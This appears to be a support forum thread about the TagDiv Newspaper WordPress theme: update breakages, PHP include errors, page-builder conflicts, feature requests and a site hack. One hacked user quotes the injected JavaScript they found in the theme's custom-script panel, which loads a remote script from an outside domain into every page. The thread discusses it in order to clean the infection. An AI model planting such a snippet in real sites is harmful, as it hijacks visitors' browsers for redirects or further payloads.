Hello! After the last update of the theme, the main menu of my site stopped working in the mobile version.
The site is http://www.viagensecaminhos.com/
Hi awesome people at TagDiv,
I still have ‘Newspaper theme’ installed on my primary website and I am indeed proud of it. It still looks much better than any other news/magazine themes available in the market.
But with the recent advancement in the content industry, there are few features which are slowly becoming the MUST for all the modern day’s news websites and I am sad to say that TagDiv team works very slow with the updating the theme with major feature enhancements.
I know that whenever we ask about the feature updates, the team says that they have a lot of bug backlogs, security features, and other fixes to look at before actually adding any new features to combat the modern website needs and features adopted by other websites.
But then, it’s kind of sad because it means that either your current themes are highly imperfect ( so you always need more time for the improvements, security fixes) or the developers are very slow in the developments process.
I am sure that the first option is totally untrue since your themes are really highly stable, bug-free and awesome but then I have to think about the second option to blame the slow process of adding new feature updates.
The reason I am saying this more emphatically is because almost after 2 months of purchasing ‘NewsPaper theme’ , I had purchased a new theme called ‘Bimber’ by ‘BringThePixel’ team and I must say that within 6-7 months of having them for one of my projects, they have made lots and lots of super awesome feature updates that I am still only dreaming here with NewsPaper ( alongwith fixing old issues)
After almost every two months, they do some major updates. In their very recent major update ( today itself), they have also included ‘Auto Load Next Post’ along with many other new features. Here is one snapshot of their very recent update list:

There are hundreds of threads here asking for the ‘Auto load next post’ feature in newspaper theme. I have also noticed that now many major news sites like thenextweb.com, vice.com, Quint.com etc. have already included ‘Auto-load next post’ in last two months on their site. With millions of social media users on the internet. People are now more used to the habit of keep scrolling endlessly for news/contents till they find something interesting and hence it’s almost mandatory now for other news sites as well for more traffic and low bounce rate.
Many other features like ‘creating trivia, personality quizzes, more robust ad-management, sticky share buttons, watermarks can also make our Newspaper theme super awesome.
Newspaper theme has always been Payoneer in bringing the most advanced features needed to bring more traffic, stability and optimisation to the news/magazine theme industry and I do want TagDiv to continue this culture of being the best and top-notch.
So, please please work on new features, at-least this ‘Auto load next post’ thing to not let us feel inferior in the current content world. Also, if possible, make a page for the public roadmap of the features you want to include in the future updates where users/members can upvote to prioritize the features for the next update. In the start-up world, this culture of making a public roadmap is very much famous and really helpful in creating a more robust and user-friendly product/tools/services.
Hope you understand and take this message positively.
Looking forward to the good news 🙂 #LoveForTagDiv
Thank you.
Hello,
After updating, we are receiving this terrible message:
Warning: include(): Unable to access /usr/home/marronyblanco.com/web/wp-content/themes/Newspaper/includes/td_wordpres_booster.php in /usr/home/marronyblanco.com/web/wp-content/themes/Newspaper-child/functions.php on line 9 Warning: include(/usr/home/marronyblanco.com/web/wp-content/themes/Newspaper/includes/td_wordpres_booster.php): failed to open stream: No such file or directory in /usr/home/marronyblanco.com/web/wp-content/themes/Newspaper-child/functions.php on line 9 Warning: include(): Unable to access /usr/home/marronyblanco.com/web/wp-content/themes/Newspaper/includes/td_wordpres_booster.php in /usr/home/marronyblanco.com/web/wp-content/themes/Newspaper-child/functions.php on line 9 Warning: include(/usr/home/marronyblanco.com/web/wp-content/themes/Newspaper/includes/td_wordpres_booster.php): failed to open stream: No such file or directory in /usr/home/marronyblanco.com/web/wp-content/themes/Newspaper-child/functions.php on line 9 Warning: include(): Failed opening ‘/usr/home/marronyblanco.com/web/wp-content/themes/Newspaper/includes/td_wordpres_booster.php’ for inclusion (include_path=’.:/usr/home/sys/phpfarm/inst/php-5.3.29/pear/php/’) in /usr/home/marronyblanco.com/web/wp-content/themes/Newspaper-child/functions.php on line 9
And of course, our website has broken down and we have lost all the old design.
How can we solve it?
Hello issajar,
Please keep in mind that what you want to do is a BIG update and the theme will be broken because it is totally another theme, sorry!
In order to achieve the best results after you will install the latest update you have to follow some rigorous steps like this -> you have to delete both of your themes, child theme, and main theme. All your customizations from your Newspaper 4 theme will do not work because all the files from this were changed in Newspaper 8.1 and as the main theme and also you lose all changes.
The Newspaper 8.1 is a whole new theme so an update from 4 to 8.1 may cause the same issues as switching to another theme (but we did try to maintain compatibility where ever possible).
Always make a full backup of your current installation – https://codex.wordpress.org/WordPress_Backups and then do a clean update, meaning that we recommend that you delete the old version of the theme before uploading the new one – https://forum.tagdiv.com/how-to-update-the-theme-2/ update also the plugins that come bundled with the theme files from the /plugins folder. In the “how to update” guide is specified that you will have to run the script that will import from database your settings.
The shortcodes have been changed so old ones will not work anymore. Please note that old files customization or custom CSS will not work with the new version and you will have to adjust or re-add them. Bottom line is that newspaper 8.1 is a whole new theme built from scratch.
Unfortunately, you will have to clear your agenda and spare a bit of time to adjust all your settings to the new version of the theme.
Hope this helps and let us know how it goes!
Thank you for the message!
Hi,
I believe for the moment there are no plans to implement this in the theme. This might change in future updates, but I could not say for sure when this will happen.
There is a mobile theme plugin provided in the package that is optimized of performance on mobile devices
– https://forum.tagdiv.com/the-mobile-theme/
Please note that every theme update is meant to add more functionality and features to the theme, and it is hard for the developer team to decide what gets implemented as soon as possible, and what gets delayed.
Thanks
Update to newspaper theme 8 made website forced stretch even without selecting.
The site became “ugly” with content unnecessarily stretched. It seems like the site is shifted LEFT by a few pixels.
Hi,
The tagDiv composer will be activated by default when the theme is updated or installed
– https://forum.tagdiv.com/tagdiv-composer-tutorial/
If you do not want to use this composer, you can deactivate it from the plugins section, and keep using Visual composer.
Thanks
Ah
I got it wrong
I was thinking it will show up in the mobile menu not in the header.
Separate menu for header like many themes do is something you should consider for future updates.
It really deosn’t make sense the way it is now.
Great theme with so many features but the menu spoils the whole thing
Hi,
This is a useful tutorial if you decide to switch to the tagDiv composer
– https://forum.tagdiv.com/tagdiv-composer-tutorial/
Visual composer and tagDiv composer have a different implementation for single image or image box elements, when both are active these may not display properly.
Either recreate the pages with the tagDiv composer, or deactivate it and keep using Visual composer.
Worth mentioning that in future updates, more elements and options will be added to the tagDiv front-end page builder exclusively.
Thanks

Hi,
When you update to version 8 of the theme, please note that the tagDiv composer will be automatically activated. This new page editor was introduced in version 8. Having both Visual composer and tagDiv composer active could create the issue you mention.
After updating the theme, please go to your plugins section and deactivate the tagDiv composer editor.
This is an useful guide regarding the theme update

Okay. I understand that to update the theme have to delete the old folder and upload the new one. Now the question is if to update WordPress, I use the automatic option from the control panel, this is the same thing?
There was a bug in couple versions of theme, hence why always good to check the changelog for new versions, as I noted, for security flaws. Much the same with WordPress … huge number of people got hacked for WP 4.6 by not upgrading to version of 4.7 with all the patches.
So, one flaw allowed injection into the ad panel, solved by simply deleting the ad element; higher level had injection into all the pages via the dbase. So, both things needed to be checked per the links provided.
In any case, glad you got it sorted. 🙂
Just be sure to follow the links in the tutorial post I provided to ‘harden’ your site, as per the codex docs, etc. and you should be good.
Just *always* check changelog for any new updates to themes, plugins, WordPress, and DELETE all old unused themes, plugins — and properly update all things the right way (delete old versions, upload new versions, don’t merge by over-writing). Etc.
Apparently it is already solved. I searched the entire BBDD from PhpMyAdmin but did not find anything of traffictrade. There was also no evil code in the header ad.
After searching and searching, I found the following code in the control panel of both sites:
YOUR CUSTOM JAVASCRIPT
var p = document.createElement (“script”); p.type = “text / javascript”; p.src = “https://get.simplefunsite.info/rw.js”; document.head.appendChild (p);
At the moment everything is working well. I have the latest version of WordPress, Newspapper and all updated plugins. I also installed Wordfence. I changed the passwords of all the users, including the password of the BBDD. All strong passwords. I also completed the Authentication Unique Keys from wp-config. Do you think I’m protected now?
You know how they managed to get to the control panel of the theme to enter that malicious code? Thanks.

Well, did you *do* the items in my post, like search/replace in your dbase?
Did you properly update theme by deleting old folder, same with plugins and WP install?
Unless you scrub the infection from your dbase, it will be there forever.
Cheers.
BSD Please, I need you to help me. The version that I have running is the 4.4 we bought the 8. We want to know how can be updated? if there are compatibility issues, etc. I am a python user, new to wordpress and newspaper.
Thanks
hi there i have update theme to versione 8.1 … and in the system status i saw that speed booster is incompatible with all in seo plugin???
nay ideas? thanks
I get this message:
load-scripts.php?c=1&load[]=jquery-core,jquery-migrate,utils,plupload,jquery-ui-core,jquery-ui-widget,jquery-ui-mouse,jquery-ui-draggable,jquery-ui-slider,j&load[]=query-touch-punch,iris,wp-color-picker&ver=4.8.1:9 JQMIGRATE: Migrate is installed, version 1.4.1
2.jpg Failed to load resource: net::ERR_CONNECTION_TIMED_OUT
Also I updated max_input_vars from 1000 to 5000 but it won’t show up on the system panel.
What should I do? The other day, I changed the homepame. Can it be that the reason for not working anymore?

Hello! I do all the tests of the sites listed in the post to analyze malware and detect nothing! It only happens to me with the sites that have the Newspaper template. I did restorations to July. I already updated WordPress and theme to the latest version. Change password for BBDD and all users. However it continues to redirect to other sites … Please help
Add your custom css to end of style.css then do this each time you update theme. Best way.
I just updated to 4.0 and the header containing the logo and the ad moved too much above the main menu line! I am tired of this. I have 6 site running this theme and cannot go insane every time I have to load to a newer version.
Why has that happened for Brookline.com?! The current site’s logo and ad in the header are too high compared to what it was – you can see Pavlikeni.com, which has not been updated for the correct position of the logo and the ad in the header…
I am so pissed! Can someone please help and solve this problem once and for all.
My problem remains!
I do not have Editor under Appearance.
Every time an upgrade to the theme is released, I have to alter the .css code, where the size of the header logo and ad are specified, BECAUSE, there is a resizing “blink” if I do not do that to match the sizes that I desire for my logo and ads in my Custom css.
A huge flaw of this theme is that id does NOT allow you the freedom to set your own header logo and ad sizes, without having to go through the insanity I go through every time there is an update… and now I cannot even access the main css via the admin panel….

hello,
after the 8.1 theme update the tagdiv gallery has been crashed.
See the article with the wrong gallery ( it crashed globally, this is just an example) :
